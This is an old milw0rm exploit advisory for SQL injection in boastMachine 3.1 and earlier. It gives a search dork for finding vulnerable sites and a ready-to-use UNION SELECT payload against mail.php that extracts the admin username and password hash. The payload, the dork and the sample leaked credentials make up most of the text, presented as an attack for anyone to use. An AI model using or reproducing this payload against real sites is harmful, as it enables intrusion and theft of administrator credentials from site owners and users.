35 lines
No EOL
1.4 KiB
Text
35 lines
No EOL
1.4 KiB
Text
########################################################################
|
|
# #
|
|
# ...:::::boastMachine <=3.1 SQL Injection Vulnerbility ::::.... #
|
|
########################################################################
|
|
|
|
Virangar Security Team
|
|
|
|
www.virangar.org
|
|
www.virangar.net
|
|
|
|
--------
|
|
Discoverd By :virangar security team(hadihadi)
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
|
|
|
|
& all virangar members & all hackerz
|
|
|
|
greetz:to my best friend in the world hadi_aryaie2004
|
|
& my lovely friend arash(imm02tal) from emperor team :x
|
|
-----------------------------------
|
|
dork: Powered by boastMachine v3.1
|
|
-----------------------------------
|
|
vuln:
|
|
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=[blog_id]
|
|
example:
|
|
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
|
|
-------------------------------------
|
|
you can see somting simillar to:
|
|
Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend
|
|
#############
|
|
'swagger' is admin user & 'e74c7cc56d033d32b8cb465c2bbc379b' is encoded admin password ;)
|
|
-------------------------------------
|
|
mybe other versions are Vulnerbil too :)
|
|
|
|
# milw0rm.com [2008-01-21] |